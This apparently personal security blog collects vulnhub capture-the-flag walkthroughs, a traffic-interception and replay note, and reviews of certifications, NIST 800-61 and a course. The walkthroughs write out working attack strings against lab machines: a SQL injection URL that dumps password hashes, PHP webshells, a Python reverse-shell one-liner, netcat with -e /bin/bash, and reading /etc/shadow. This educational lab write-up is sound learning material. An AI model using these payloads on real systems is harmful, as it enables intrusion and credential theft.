September 19, 2017

Binary protocol inspection

   Sometimes during testing you need to observe traffic between endpoint and server. Also communication protocol can be proprietary, with no TLS wrapping. So to sniff and see what is going on you need to make some changes. In next few lines I will explain how to make a transparent bridge on L2.

   Here is a scheme how to connect yourself and other devices for convenient sniffing:)

endpoint --------> my switch ------------>my laptop -------->server

   So endpoint and my laptop's first adapter are connected to switch. My second adapter is connected to server. To create bridge I use brctl:

brctl addbr vinegrep - create bridge with name vinegrep

brctl addif vinegrep eth0 - add interface eth0 to bridge

brctl addif vinegrep eth1 - add interface eth1 to bridge


Launch wireshark and enjoy observation:)

   Let's make task a bit more difficult. New goal: intercept traffic and try replay attack. The previous part from above is still relevant as a first step. So next, assign IP address to bridge. Then I load br-netfilter kernel module and force that all traffic will be intercepted by iptables:

ebtables -t broute -A BROUTING -p ipv4 -i vinegrep -j DROP

   As a next step I need to create a rule that will forward traffic to my interception proxy. My proxy is listening on port 5555 and server is using tcp port 2608. 

iptables -t nat -A PREROUTING -i vinegrep -p tcp --dport 2608 -j REDIRECT --to 5555

   Now the most interesting part: proxy. There are not many software to choose. I found three options:

  1. NoPE plugin for Burp (https://github.com/summitt/Burp-Non-HTTP-Extension)
  2. binproxy by NCC (https://github.com/nccgroup/BinProxy)
  3. Trudy VM (https://github.com/praetorian-inc/trudy)
I choose NoPE plugin. There is a good video how to use it here - https://www.youtube.com/watch?v=4K0ZhWImtdw. In my case I did not use DNS, just intercepted packet, sent it to repeater and flood server. Primitive replay attack.


May 21, 2017

Hackademic RTB2 Walkthrough

   Today I will write a small review about intermediate level challenge Hackademic RTB2. You can download it from awesome vulnhub - https://download.vulnhub.com/hackademic/Hackademic.RTB2.zip

1. Reconnaissance 


As usual I started with netdiscover:


Next step was to scan ports:


2. Enumeration


In reality I spent a bit of time as port 80 did not reveal anything, port 666 was filtered. I used tool called knock-knock (https://github.com/pan0pt1c0n/knock-knock). After running it I saw port 666 as open. I examined source code of the page and it was shown as Joomla. I enumerated target more using metasploit module for Joomla plugins as it is quite often that plugins are vulnerable.

3. Exploitation

I was right: sectionid was vulnerable to SQL injection. As a next step I entered quote to verify whether it was a true:


As a next step I reviewed Joomla documentation to understand in what table user hashes are stored. I did hands-on SQL Injection exploitation instead of using sqlmap. I revealed field that was suitable for data exfiltration, enumerated tables and etc. I used this request to extract information about users:
http://192.168.57.102:666/index.php?option=com_abc&view=abc&letter=AS&sectionid=1%20union%20select%201,concat(username,0x20,password)%20from%20jos_users--

This gave me hashes:


I cracked hashes using Joomla_cracker.pl from https://gist.github.com/cobra-tn/2304218. Cracked hashes did not give me any new footpath. So I decided to utilize another SQLi option - retrieve files. By default Joomla configuration file located in web root. I assumed that /var/www was default path. After I retrieved file I tried "root" username and password to login in phpMyAdmin.


I was able to login. Then I spent some time to create limited shell. I used this video as an example: https://worldhack3r.wordpress.com/2013/05/06/upload-shell-in-phpmyadmin/. To tell long story short: I created database and table in MySQL. Then I used INTO OUTFILE MySQL command to create PHP shell in web root:
SELECT "<? system($REQUEST['cmd']); ?>" INTO OUTFILE "/var/www/cmd.php"


Then I used this shell to create connection back to my machine using python.

192.168.57.102:666/cmd.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.57.101%22,443));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

4. Privilege escalation

After quick enumeration I tried several kernel exploits. Machine was rooted using "RDS socket" exploit - https://www.exploit-db.com/exploits/15285/. I uploaded exploit code using wget to /tmp, compiled with default gcc and got root.


Conclusions

In general machine was not difficult, there were only few tricky moments to overcome:
1. port knocking - understand that it is in use and find ways to bypass
2. use SQL injection not only to dump hashes but also enumerate files on filesystem
3. shell in phpMyAdmin

May 2, 2017

SLAE compilation problem

   This is a quick note about how I overcame some compilation problems during my SLAE course. Review about the course will be soon. So when I tried to compile shellcode that simple spawn a shell using code that was provided in videos I faced: "Program received signal SIGSEGV, Segmentation fault." I checked everything not once, everything was OK, no stupid typos and stuff like that. So next after some googling I found 2 questions on stackoverflow with similar problem. Problem was that in current systems all .text area are marked read only by default. 

1. First advice was to use -N option while linking: ld -N shellcode.o -o shell (http://stackoverflow.com/questions/13777445/execve-shellcode-writing-segmentation-fault/13777931)
2. Second option is to use gcc with -omagic option: gcc --static -g -Wl,--omagic -o shellc shell.c (http://stackoverflow.com/questions/27581279/make-text-segment-writable-elf)

   Both ways were working as a charm.

March 12, 2017

VMware Workstation + Archlinux = nightmare

Hi all,

This is a quick one. I think lots of active Arch users struggle a lot with every kernel update to run VMware Workstation. Unfortunately awesome vmware-patch from AUR (https://aur.archlinux.org/packages/vmware-patch/) not always helpful.

Here is some advise how to fight against several errors:

1. Error: /usr/lib/vmware/modules/source/vmmon-only/linux/hostif.c:1165:13: error: too many arguments to function ‘get_user_pages’

I saw this after kernel upgrade to 4.7. I used this link (https://communities.vmware.com/thread/536705?tstart=0) with solution to recompile required modules.

2. Errors: /vmmon-only/linux/hostif.c:1592:47: error: ‘NR_ANON_PAGES’ undeclared (first use in this function)
and
/vmnet-only/netif.c:468:7: error: ‘struct net_device’ has no member named ‘trans_start’

These 2 errors you can see after upgrade to 4.8. Here is handy solution with sed:
https://sysadmin.compxtreme.ro/vmware-modules-arch-linux-kernel-4-8-13/

3. Error: /tmp/modconfig-HDxzxN/vmmon-only/linux/hostif.c:1166:13: error: too few arguments to function ‘get_user_pages_remote’

This error you will see after upgrade to 4.9. Here is a thread about this error https://communities.vmware.com/thread/552232 with solution. You can use script from TobInover to fix an issue.

I wish all the best, waiting for new kernel updates:)

Hackademic RTB1

   Here is the time for another walkthrough - Hackademic RTB1.
You can download iso from awesome vulnhub -  https://www.vulnhub.com/entry/hackademic-rtb1,17/

1. As usual we started with netdiscovery:


2. Nmap was the next step:


3. I spent some time on web server and found out that it used outdated wordpress. So next step was to run WPScan.


I tried both SQL Injections from list but no luck. So I went through different parameters to find maybe there were other vulnerabilities. I found out that cat parameter was vulnerable. Instead of using sqlmap I did initial steps myself. I used UNION SELECT to reveal amount of columns:

http://192.168.57.101/Hackademic_RTB1/?cat=1 and sleep(0) UNION SELECT 1,2,3,4,5

I revealed that there were 5 columns and second column had varchar type. The tricky part here is to understand why you need to add sleep(0):)
If you stuck, see a good video from ub3rsec - https://ub3rsec.github.io/pages/2016/hackademic-rtb1.html about manual SQL Injection.

4. Extracted user information from DB using sqlmap:

sqlmap -u 'http://192.168.57.101/Hackademic_RTB1/index.php?cat=1' -T wp_users --dump

Also sqlmap suggested to run dictionary attack against extracted hashes and successfully cracked them all:


5. User GeorgeMiller had admin privileges in wordpress. I used this link to login: http://192.168.57.101/Hackademic_RTB1/wp-admin/.
Next step was to enable file upload functionality in Miscellaneous, allowing PHP files to be uploaded:


6. To obtain shell I used PHP reverse shell from Kali webshells folder. I opened port on my machine and caught connection. Next step was to elevate privileges.
I spawned normal shell using python (python -c 'import pty; pty.spawn("/bin/sh")') and after a bit of enumeration found kernel version:


7. I used exploit suggester for this kernel. You can find this program here - https://github.com/PenturaLabs/Linux_Exploit_Suggester.
The output was:


I tried several exploits before succeeded with rds.
I ran python built-in web server on my machine using: python2 -m SimpleHTTPServer 8080

8. I downloaded and compiled exploit on victim machine:


and got root:


   Thanks to p0wnbox.Team for this challenge.
 
   I think this box has intermediate level of difficulty, however if you do everything using only automated tools it would be much easier.

December 16, 2016

21LTR: Scene 1 Walkthrough

Today I will write my "21 LTR:Scene 1" walkthrough from https://vulnhub.com . You can download it here - https://www.vulnhub.com/?page=16#modal3download.
Also 2 write-ups are already available:

Firstly, g0tmi1k, thanks for awesome resource of fun! Secondly, I will show my steps to get in as a step by step list of commands, explanations and screenshots. Let's start.

Walkthrough


1. Find out vulnerable machine IP: netdiscover -i vboxnet2
2. Let's scan for open ports: nmap -sS -A -p 1-65535 192.168.2.120
It is always important to check all TCP/UDP ports, because it is quite common that some sysadmins think that port from high range is a good defense. Security through Obscurity! Here is the output:


3. I tried to login with anonymous credentials to ftp - no luck. I ran dirsearch.py to enumerate directories. Great tool, you can check it here - https://github.com/maurosoria/dirsearch. Tool found 3 directories with no valuable information there. If you have a web page - always examine source code. It can give you hints about software version and sometimes really expand attack surface. On http://192.168.2.120/index.php/login/ I found this:
4. I used this credentials to login FTP. There I found backup_log.php file. I tried to access this file using URL http://192.168.2.120/logs/backup_log.php and saw a page with recent backup reports. 


At this moment I was stuck for a while. From my OSCP experience I remembered one valuable advice: "Don't know what to do? Listen on what is going on the wire." The only change I did was IP. I used 192.168.2.240 because I saw this in report.

5. I launched wireshark and went for coffee. When I was back I saw this:


Victim tried to connect on port 10000. OK, let's launch nc -nlvp 10000.
After some period of time I saw some binary data received by nc. Before jumping in rabbit hole with received data, I tried immediately to connect to port 10001: nc -nv 192.168.2.120 10001. I got empty shell with no output. It looked like victim was executed something on 192.168.2.240 machine and then opened port 10001 for short period of time to receive results.

6. I tried to insert commands without success but then I executed backup_log.php one more time and saw this:


Let's try to insert PHP one-line webshell: <?php echo exec($_GET["cmd"]);?>
I always prefer to use reverse shell when it is possible, so I can navigate on vulnerable machine without inconvenience. Let's try netcat with -e option: http://192.168.2.120/logs/backup_log.php?cmd=nc -nlvp 2608 -e /bin/bash

7. We are in! We have apache privileges. Not too much really. Let's spawn full shell using python -c 'import pty;pty.spawn("/bin/bash")' By the way, here is an excellent cheat sheet how to spawn shell using different languages - https://netsec.ws/?p=337
Privilege escalation is always a tricky thing. I often start with enumeration and then go for kernel exploits. For enumeration I advice this article from g0tmi1k - https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
For exploitation attempts you can try this perl tool - https://github.com/PenturaLabs/Linux_Exploit_Suggester. It is quite accurate.

8. During enumeration I found archive in /tmp - backup.tar.gz. After first decompression I found it in media/backup/pxelinux.cfg.tar.gz. Let's see what we have in /media. USB_1 sounded as attached USB key. I found there ssh private key, located in /media/USB_1/Stuff/Keys. Also I enumerated users in /home folder.


9. I copied the id_rsa key and tried to bruteforce ssh using usernames from /home and copied key. I was lucky with hbeale. Next step for me is always to run sudo -l. It saves so much time. Here I found that I can run cat with no password check. I tried cat /etc/shadow and got hash for root password - $1$VW5E9DmD$deoML8uqU/4HaTmNmfM7G1. I ran john with rockyou dictionary to find out password. 3 seconds later I found that password was "formula1". 


Using su and password I got root privileges. Done!

Lessons Learned


Key to this machine is to understand how to use port 10001. Without passive reconnaissance you won't be successful. Also it is essential to dig into and enumerate accessible folders on the machine. Examining each folder can be boring, but you can also automate this using tools from here - https://github.com/reider-roque/linpostexp

Good luck in your research and mastering!





October 26, 2016

CompTIA Security+ certification review


Overview

   I will start my certification story with Security+. At the beginning of 2015 my wife and I decided to relocate from Russia somewhere in Europe, because technical security jobs in my city are at low demand with pretty shit salaries by the way. So one of the first steps for us was to convert my knowledge in something more recognizable all around the world. I read some reviews regarding different certifications and decided to start with CompTIA Security+. I knew that this certification is an entry level one for security, so I it didn't take much time to prepare. Another important reason was that English is not my native language, so I wanted to get a feel of enterprise security terms and approaches.
   I have quite weird thoughts about certification process itself. It is not rare that certification is used not for proving skills, just to move up for career ladder regardless what you know and your abilities. That is why I am a big fan of Offensive Security guys, their approach and frustration. Obviously for Security+ you can easily google dumps, but if you don't understand the actual material you will struggle a lot in feature. By the way price around 300$ is quite challenging in Russia I decided to pass exam myself as I did before in school and University. I was always bad in "copy-paste" way.
   I examined CompTIA site and found more details about themes:
  • Network Security - 21%
  • Compliance and Operational Security - 18%
  • Threats and Vulnerabilities - 21%
  • Application, Data and Host Security - 16%
  • Access Control and Identity Management - 13%
  • Cryptography - 11%
All questions were divided on these categories. 90 questions/90 minutes to complete exam. 900 points maximum, 750 to pass. Let's prepare.

Preparation

There were 2 books for Security+ preparation:

Both books were excellent preparation guide. Let's dig a bit in. Topics were quite similar, so I will speak about both books in general.
  1. Network Security. Here you will find all variety of topics about firewalls, IPS/IDS, VLAN, DMZ, NAT, protocols from different layers of TCP/IP stack and etc. In exam most of the questions in these domain would be about port numbers and associated protocols, effective security measures to lock down security on network level, wireless security.
  2. Compliance and Operational Security. This part is quite boring and annoying, but I can't but mention the fact that these topics would be very helpful for you when you will decide to ask security budget increase or buy new fancy useless security toy=) Disaster recovery, backup plans, incident response, risk management - understanding all these topics would be handy to speak with business. More interesting to read about physical security and security administration. Remember all abbreviations, what they mean and how technical stuff influence them.
  3. Threats and Vulnerabilities. I think most interesting topic in both books. You will dive in malware classification, application and general attacks, social engineering. Most questions from this category would be about choosing best way to mitigate some threat or to distinct one threat from another.
  4. Access Control and Identity Management. Here you will deal with authentication/authorization (802.1x, port security, RADIUS and etc), host-based security software, ways to improve security on endpoints. Most questions would be about how to implement these features to address specific threat in most effective way.
  5. Cryptography. Key concepts of symmetric and public key cryptography, hashing, most common protocols, limitations and recommended parameters to use. Also network protocols which use cryptography heavily would be described: IPSec, TLS, HTTPS and etc.

Exam

   My review would not be really full without my impression about exam. Actually it was not too bad. CompTIA gave you various number of situations and asked for best solution in this situation. 2 out of 4 answers were quite stupid, but to choose right one you will probably need to think a bit. It was all about choosing best variant. You need to remember 2 parameters from situation in your head to do right  choice. Also you can find performance-based questions, which were far away from practice. In one question you will probably found parts from different domains. For question examples-have a look at samples in books above.
   I spent 2 weeks to prepare for this exam. I did it in PearsonVue center. I used about 60 minutes to achieve 880/900, probably I missed 1 or 2 questions. My first step towards relocation was made.

Conclusion

This exam can prove your entry level of understanding security. It is not hard technical exam, more situation based. Obviously, good university would provide all necessary background to pass this exam quickly. If you are looking for Level 1 position or your first infosec job it is a good choice. With my current level of experience and knowledge I would not bother to recertify after expiration.

October 17, 2016

Share is fun!

   A lot of things happened since my last blog post. During last 2 years I could not find time to write a blog post=) Lie! However, now my wife and I raise 2 beautiful kids and we teach them that "share is fun". As you know, in order to show best example for kids you need to follow your own words. Let's get it started!

   I have a lot of material to share in my blog. I will try to write frequently, at least 2 times a week. I am going to cover different things:

  • my experience of passing Security+, CEH, OSCP, OSWP, OSCE, SANS GXPN. Also I hope to achieve SANS GREM and SLAE this year, so probably I will cover them too.
  • talk about Info Sec books, blogs and other resource I use to broad my knowledge. Unfortunately, there is not too much really good resources and books, so I will try to cover them.
  • describe interesting stuff that I face during my way in Info Sec. I am not going to copy/paste excellent materials from Corelan, fuzzy security and etc, but I am going to explain moments that was not clear for me during reading and I spent some time to research it.
  • create series of articles regarding Linux exploitation and some other things that is not clearly described in the Internet. Before starting something like this I will examine carefully available resources in order not to reinvent a wheel.

My main goal for this blog is to make it unique, interesting to read and valuable for different folks in Info Sec field.
   

February 20, 2015

NIST 800-61. Computer Security Incident Handling Guide

   I can call this standard as «CISO Time!» As far as computer security incidents are corncerned enough companies act in a reactive way. We have an incident, let's do something to reduce damage. Sometimes they thought how to patch vulnerabilities, which leads to some kind of remediation. And then wait for another incident.
   Also there is another way to deal with incidents — proactive way. In this standard you can find some useful steps how to implement incident response activities in company's every day life. Almost all recommendations are obvious, but they are placed together. If you are going to write incident response plan, you can follow instructions in this standard and you'll get sufficient plan.
   Standard consists of 3 parts. First part is devoted to organizing a Computer Incident Response (CIR) Capability. In this chapter you can find useful information about policy and plan elements, also with obvious advantages of developing CIR plan. Some pages describe how to effectively communicate within organization and what departments should participate in incident response activities.
   Second chapter was about how to handle an Incident. This activity consists of 4 steps: Preparation → Detection and Analysis → Containment, Eradiction, Recovery → Post-Incident Activity.
   As far as preparation step is is concerned I can't but mention 3 main activities:
  •  get all necessary contacts from people with whom you are going to work while CIR; 
  • all incident analysis hardware and software should be up to date and easy to use; 
  • incident analysis resources are also important, because using them you have all information about infrastructure in one place.
   Detection and analysis is one of the most important part of the plan. First of all, you should determine attack vectors, indicators and profile activity in your infrastructure. When you understand normal behaviour and create correlation and log retention policies you will be able to prioritize incidents. It is better to make such decision with colleagues and top-manager, such as CISO. Generally, you can try to divide incidents by functional or informational impact and recoverability, but every company can find their own criteria about how to prioritize incidents.
   Containment and eradication also as a recovery can be much different because of your organization internal policies. Containment depends on many factors as impact on SLA, potential damage and so on. Eradiction should be carefully done, because of possible information lost. Effectiveness on this step is fully depends on how good detection analysis was performed. Almost all recovery procedures are held by IT staff. It is their part.
   Post-Incident Activities include lesson learned meetings after incident. On this meetings your CIR team should update CIR policies and procedures, create chronology and monetary estimate of the amount of damage. Based on this lessons you can justify fundings, help your IA department to find incident trends and systemic security weaknesses. Also measures of success can be renewed. It is always important to understand when incident is localized and eliminated.
   In this chapter you can find CIR handling checklist. It is very brief, but also helpful to start from. The last part is devoted to coordination and information sharing. It is also a good start to from your list whom to call and what to say. Special attention in this standard is paid to granular information sharing because of business impact. It is better to speak with law and PR departments before presenting information to some unauthorized people.
   In conclusion, I would like to say that this standard is not a full guide about CIR. It is only a brief review. Almost every topic should be expanded with different technical and administrative measures. But if you don't know where to start or even you know — it is a good review to check your key positions. Great job, NIST!

February 2, 2015

Review on Software Security Course by Maryland University on coursera.org

   This course was my second course in Cybersecurity specialization. Syllabus you can find here. In brief this course gave me a lot of fun. From my point of view there was a good start, but at the end it became a little bit boring, brief and easy.
    There were 6 weeks, 6 quizzes and 3 labs. First lecture was about low-level memory-based attacks. Stack smashing and format string attacks were well described, there were clear examples, so if you are not familiar with this attacks you can find here useful information. I can't but mention references at the end of the week. There were a lot of links, which provided detailed and deep description of these attacks. Well done, professor! As for me, ROP description was not clearly explained and there were not enough examples to understand it without addtional reading.
   Week 2 was devoted to defense mechanisms against memory attacks. Key technics, such as stack canaries, DEP, ASLR, memory-safety enforcement, control-flow integrity (CFI) were described in details. During these 2 weeks students had time to finish lab 1. It was a vulnerable software with source in VirtualBox image. Professor also provided this lab with step-by-step instructions. It was great pleasure to find flaws, to write exploits and using gdb. I appreciate such tasks because in educational programms there is lack of practice, especially in practical information security.
    Nowadays everything migrates to web. Professor devoted week 3 and lab 2 to web flaws. In brief there were descriptions and examples of SQLi, XSS, CSRF and Session hijacking. Some defensive mechanisms were presented too. In order to create lab BadStore distib was chosen. It is damn vulnerable web app with lots of flaws. Unfortunately, tasks in lab was very easy. As for me it will be more useful and tough to use XSS or SQLi to get access, than find out some cookies info.
   Secure design in week 4 was pretty easy to understand. It was great, that principles of designing was introduced in course. In this week you can find basic definitions? Such as authentication, authorization and etc. Also there were criteria of a good model, key principles of secure design. They are obvious, but very hard to follow.
   Week 5 was a nightmare. I suffered and struggled with static code analysis. From my point of view this technology is efficient, but also it needs much more experience in software development than an average student has. As for me, quizz after the lecture was incredibly difficult, some ways of static analysis procedure was not fully described in lectures, but they were in quizz. Additional reading was Brian Chess and his book - «Secure Programming with Static Analysis». Great book, but without enough coding experience and time for understanding for me it was rocket science. Symbolic execution theme was fair, good examples and clear description of principles gave me an opportunity to solve quizz questions.
    Lab 3 was connected with fuzzing. In brief we fuzzed app from Lab 1. It was very easy and I didn't spend much time on thinking about it.
   Week 6 was greatly titled «Penetration testing». But I was confused, because Professor in brief told us several well-known tricks and software without going deeper. Some words was about fuzzing, but not enough to understand underlying algorythms.
   Course was pretty good at the beginning. 3 weeks was great, 2 good labs. I thought it would be better and better. But at the end themes became a little bit boring and unclear. May be they were in a hurry. If this course would be expanded with heap overflow and ROP examples, more information about XSS and CSRF, more practice and entire week or two about pentest it would be great and unbelievable. I think professor can do it!